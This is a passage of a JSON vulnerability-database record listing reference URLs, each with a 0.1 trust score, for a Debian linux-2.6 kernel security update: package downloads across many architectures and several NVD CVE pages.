        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0298"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4027"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4538"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
